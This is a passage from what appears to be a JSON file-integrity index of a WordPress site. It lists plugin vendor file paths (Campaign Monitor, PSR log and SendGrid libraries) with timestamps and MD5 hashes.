"h\":\"6b47b867dbabfc90a44e139b65208b59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/clear_rules.php\":{\"d\":1534138295,\"h\":\"ad8c883b280dc7c73df638107ab9319f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/create.php\":{\"d\":1534138295,\"h\":\"332e6ee2e110069eb55984ca73fb1c26\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/delete.php\":{\"d\":1534138295,\"h\":\"dcf277ebd4665264f37807bb69618e0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/segment\\/get.php\":{\"d\":1534138295,\"h\":\"22d1aebff3e321eca1243addf1563c55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/update.php\":{\"d\":1534138295,\"h\":\"184bb3b1135ba651a32fc5b1f803fbe3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/get_history.php\":{\"d\":1534138295,\"h\":\"51f1fd6a57f3a4f903b8a240e2abb90f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/add.php\":{\"d\":1534138295,\"h\":\"6de8788edde8991bf097f9a1fbb8ec7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/delete.php\":{\"d\":1534138295,\"h\":\"a0ff8d2d8096215237a45ab64931e201\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/unsubscribe.php\":{\"d\":1534138295,\"h\":\"6b090b33817947869bae9d7ea74219a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/import.php\":{\"d\":1534138295,\"h\":\"9544edc3198ab802d9c7a4bb5471a3d7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/subscriber\\/get.php\":{\"d\":1534138295,\"h\":\"12f56877fab870f5d1661b9f0afc4493\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_lists_and_segments.php\":{\"d\":1534138295,\"h\":\"8283e6d7e5ee12105a50ddceff1cefb2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_recipients.php\":{\"d\":1534138295,\"h\":\"560f808c2bb5b433ba523a067a751c39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/send.php\":{\"d\":1534138295,\"h\":\"85bb1f021d464b5dae1019da173a9c2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/send_preview.php\":{\"d\":1534138295,\"h\":\"425ecb43ca6c974afdcadc1c0140fecb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/unschedule.php\":{\"d\":1534138295,\"h\":\"f4b51b9d91319fc0dcf640069bc8b81f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_unsubscribes.php\":{\"d\":1534138295,\"h\":\"897b7b407415346d6482076cd89a1bfa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_bounces.php\":{\"d\":1534138295,\"h\":\"e63004b9535c74168d046bed13c10ee3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_clicks.php\":{\"d\":1534138295,\"h\":\"d4a75e82cc91c74a4605cb5719c801ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_opens.php\":{\"d\":1534138295,\"h\":\"b6da2a4cd3af5278493168781fc80b28\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_spam.php\":{\"d\":1534138295,\"h\":\"55cc045f93fb475bb12e10e24bed37a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/create_from_template.php\":{\"d\":1534138295,\"h\":\"2d59abd0476c5a4d4afa4594a913fb5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/create.php\":{\"d\":1534138295,\"h\":\"7cace5fb8fa64bf9843ff4138e65a488\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/delete.php\":{\"d\":1534138295,\"h\":\"b9c0ce00735296c81dc2b376351e59b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_email_client_usage.php\":{\"d\":1534138295,\"h\":\"968801d380b057b4a253c6d55b20bf0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/campaign\\/get_summary.php\":{\"d\":1534138295,\"h\":\"db9f98a6cf207fc1b8a322d6f15d13fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/events\\/event_track.php\":{\"d\":1534138295,\"h\":\"78325053f6f63ad05f2a3690ec044427\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/smart_details.php\":{\"d\":1534138295,\"h\":\"02ce223d7dd4bf5fba4bf8092b3943f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/timeline.php\":{\"d\":1534138295,\"h\":\"76420ffe3e60587ac980e44c3966374f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/classic_send.php\":{\"d\":1534138295,\"h\":\"a56a601bd60ada86032930cda034321a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/smart_send.php\":{\"d\":1534138295,\"h\":\"19b40d1f30fdd829c15d71cab94af2ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/classic_groups.php\":{\"d\":1534138295,\"h\":\"9d5aaa58a452560d2b80d55d6656696a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/transactional\\/smart_list.php\":{\"d\":1534138295,\"h\":\"816b76ac52ecc638bcea95cf4ebf1fad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/authentication\\/auth_with_oauth.php\":{\"d\":1534138295,\"h\":\"1881f307872d1fae22997a4693ced780\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/authentication\\/auth_with_api_key.php\":{\"d\":1534138295,\"h\":\"5ec2a621094c4ff7c63d06b00014d583\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/authentication\\/refresh_token.php\":{\"d\":1534138295,\"h\":\"9eaa613ebdf734a0da3bcb6afaa8a114\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/authentication\\/exchange_token.php\":{\"d\":1534138295,\"h\":\"b29bce7a2cbf4d0538291c742abd352c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/authentication\\/get_authorize_url.php\":{\"d\":1534138295,\"h\":\"dc9ad491d320f0bf25e74d59f6d78879\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/template\\/update.php\":{\"d\":1534138295,\"h\":\"7f8bfe822a19e41d2650820fef85a4b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/template\\/create.php\":{\"d\":1534138295,\"h\":\"ecf7ffc21aa8250302247aea9ce2141b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/template\\/delete.php\":{\"d\":1534138295,\"h\":\"8a5826132b22df8f10d98247a652b12b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/template\\/get.php\":{\"d\":1534138295,\"h\":\"918041b6be0700135e7888bbe52b9ae6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_stats.php\":{\"d\":1534138296,\"h\":\"56c9468e409969b86f89d3b34520602d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_custom_fields.php\":{\"d\":1534138296,\"h\":\"2c088f883c3d93305dc76d0f8ae13cf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/activate_webhook.php\":{\"d\":1534138296,\"h\":\"17ec7bb74b2e2da3d638b9e483b6ae28\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/deactivate_webhook.php\":{\"d\":1534138296,\"h\":\"d153c136a4ee945261bad3ce66e9374c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/create_webhook.php\":{\"d\":1534138296,\"h\":\"e821de62b441ace11b46161a3ae5209a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/update.php\":{\"d\":1534138296,\"h\":\"1fd75af0a7975b3a38a73ea095d267fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/create_custom_field.php\":{\"d\":1534138296,\"h\":\"b1e7f089a9b00d21e73ec4fe758af6c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/update_custom_field.php\":{\"d\":1534138296,\"h\":\"8d05d379ea6bd3db8d4eec414177484b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_deleted_subscribers.php\":{\"d\":1534138296,\"h\":\"ce2fc9006eaa6527c76bba3ede040213\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/list_webhook_receiver.php\":{\"d\":1534138296,\"h\":\"12ca45146c050f341423f80acbe688aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/delete_webhook.php\":{\"d\":1534138296,\"h\":\"7067aeac2c4b6880d69454795cbcfbad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/test_webhook.php\":{\"d\":1534138296,\"h\":\"ee5569efaa7ec24498560dcb842a50cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_active_subscribers.php\":{\"d\":1534138296,\"h\":\"456f5381e8811d7171dd74fb9d9f67dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_unsubscribed_subscribers.php\":{\"d\":1534138296,\"h\":\"66bc8f6b6f3191034d56337cbfbc4648\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/create.php\":{\"d\":1534138296,\"h\":\"738e2a658dd5941d3bdfdab07c078a5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/delete.php\":{\"d\":1534138296,\"h\":\"92572bf0078d55f8456c0c7e7aa2cb4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/delete_custom_field.php\":{\"d\":1534138296,\"h\":\"086650a0ef740d29e208fd7e8182a10c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/update_field_options.php\":{\"d\":1534138296,\"h\":\"97fb9d35b78e33a68cdc88be9d6b180f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_segments.php\":{\"d\":1534138296,\"h\":\"ecadf038ad1edd7327f47c00d99f511a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_bounced_subscribers.php\":{\"d\":1534138296,\"h\":\"9d9aeb4456a6e59561ae6e89dc3ba83c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_webhooks.php\":{\"d\":1534138296,\"h\":\"a3adc3e61c664eae88480a1e42c4ec8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get.php\":{\"d\":1534138296,\"h\":\"4b8396705575c96fdeaf08ad2b5a1aef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/list\\/get_unconfirmed_subscribers.php\":{\"d\":1534138296,\"h\":\"7395a08ef11b6cdf396471421e4ce40e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/external_session_url.php\":{\"d\":1534138295,\"h\":\"5bf6e297a0f7e89c778e950d2531d3bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_countries.php\":{\"d\":1534138295,\"h\":\"23af5ecd7d9b14743a99347593e987b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_clients.php\":{\"d\":1534138295,\"h\":\"b20c2e5198a38b5e50fe91a1a3716339\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_billing_details.php\":{\"d\":1534138295,\"h\":\"6073b23fa1e84b9779b2aa2e9d8fc2fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_timezones.php\":{\"d\":1534138295,\"h\":\"2855d1b98db96fe522e27c352a105935\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_systemdate.php\":{\"d\":1534138295,\"h\":\"eb3485e8b83d1d38976cbd8570b95522\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/samples\\/get_apikey.php\":{\"d\":1534138295,\"h\":\"cc283a022ac18ac67ef9ad280f9a23fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/exceptions.php\":{\"d\":1534138296,\"h\":\"37acfe3a57af07aff693744f45c70cd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/base_classes.php\":{\"d\":1534138296,\"h\":\"1211a104afa5e56e8a90018ec34cafeb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/transport.php\":{\"d\":1534138296,\"h\":\"93ec9260c9e9a93f32606451c9a23b89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/log.php\":{\"d\":1534138296,\"h\":\"219bf3c78daf036029c7178d6bb37a08\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/cacert.pem\":{\"d\":1534138296,\"h\":\"c29d362201b1bd232898d2b658811db2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/services_json.php\":{\"d\":1534138296,\"h\":\"f6249cf1bb6b4910c2a1047230e20bd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/class\\/serialisation.php\":{\"d\":1534138296,\"h\":\"e5359af573ed84cbc6d5888a16e288e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_general.php\":{\"d\":1534138296,\"h\":\"2b82ed2bad19b41d196c8a4d1231d55e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_segments.php\":{\"d\":1534138296,\"h\":\"ab03900c7e41273f558ba09eda8148bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_clients.php\":{\"d\":1534138296,\"h\":\"2a85f77c5c99de1ba085e808bd36b59b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_people.php\":{\"d\":1534138296,\"h\":\"c2325e4a73aaa8920f55aba20436a530\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/composer.json\":{\"d\":1534138296,\"h\":\"f5e0636937864d86a957870aca2e2308\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_transactional_classicemail.php\":{\"d\":1534138296,\"h\":\"9a44ae8a405ec23c26476731aeba035c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_templates.php\":{\"d\":1534138296,\"h\":\"d2c05ed30b71c2ca766a7ad82c103deb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/composer.lock\":{\"d\":1534138296,\"h\":\"eb50a673e699a1da82988cba9d2e3380\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/HISTORY.md\":{\"d\":1534138296,\"h\":\"f5b1d0f651c7611c94750f0623c9d037\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_subscribers.php\":{\"d\":1534138296,\"h\":\"8dc91570865359475a77f8397577b5c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/README.md\":{\"d\":1534138296,\"h\":\"90a7855700d85e14211baf5399810a3d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_transactional_timeline.php\":{\"d\":1534138296,\"h\":\"b72f956bd20ddd29b239077c13bdc970\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_administrators.php\":{\"d\":1534138296,\"h\":\"473efa284d8b41651cb4ebbfdf909650\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_campaigns.php\":{\"d\":1534138296,\"h\":\"3d3ba249e661dcbd59a1f1463b90a980\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_lists.php\":{\"d\":1534138296,\"h\":\"61d24def9d01ee157ed02235714b2fb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_transactional_smartemail.php\":{\"d\":1534138296,\"h\":\"68a3bcc72fa82e8d15b7472ba1acc79a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/csrest_events.php\":{\"d\":1534138296,\"h\":\"a8d5c6f6ddfca4e61b6ce129750e6f1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/RELEASE.md\":{\"d\":1534138296,\"h\":\"5efce8234607beab27bf466b23fc4535\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/CONTRIBUTING.md\":{\"d\":1534138296,\"h\":\"cb78f59d308ff4bc2aefbfa778928b9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/campaignmonitor\\/createsend-php\\/LICENSE\":{\"d\":1534138296,\"h\":\"e4306d4b6c77f2db816ec4aed73a13c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/Test\\/LoggerInterfaceTest.php\":{\"d\":1534138295,\"h\":\"660a7ddd367dbf434c5ec6e463149d42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerInterface.php\":{\"d\":1534138295,\"h\":\"1ae09682227159416a299d0ea940d34e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerAwareTrait.php\":{\"d\":1534138295,\"h\":\"221f47ac7d3da4800d2c0e26cdfb351b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerAwareInterface.php\":{\"d\":1534138295,\"h\":\"cfac6d4dc3ebf2c7f0e49f74d1bcd44a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/AbstractLogger.php\":{\"d\":1534138295,\"h\":\"26eb607e5318188016615326bd89a9be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/NullLogger.php\":{\"d\":1534138295,\"h\":\"d66f51c1fc729b09e54fd8821c7dfe46\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/InvalidArgumentException.php\":{\"d\":1534138295,\"h\":\"7d2f0bd1583524d739fff12f0507de65\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerTrait.php\":{\"d\":1534138295,\"h\":\"d1152080b1b7a8812f6a3023b63f0fc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LogLevel.php\":{\"d\":1534138295,\"h\":\"cc226142fd5d390d030b39c61cf97843\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/composer.json\":{\"d\":1534138295,\"h\":\"6e872afc69e782d4a56d2d7094bb24b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/README.md\":{\"d\":1534138295,\"h\":\"144a71a4e1f9c67ac79751acc37614c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/psr\\/log\\/LICENSE\":{\"d\":1534138295,\"h\":\"1a74629072fd794937be394ab689327e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/sendgrid\\/php-http-client\\/lib\\/Client.php\":{\"d\":1534138296,\"h\":\"b7732354f4328b54365c68acb1a3795b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/sendgrid\\/php-http-client\\/lib\\/Response.php\":{\"d\":1534138296,\"h\":\"ee810fd78f810b6bd55f781ffc49d169\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/installed.json\":{\"d\":1534138296,\"h\":\"56f817e4a38c70ec0835f0ebc1e9e317\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/sendgrid-php\\/vendor\\/composer\\/autoload_static.php\":{\"d\":1534138296,\"h\":\"12838080319909d98840cb2db0f0172b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor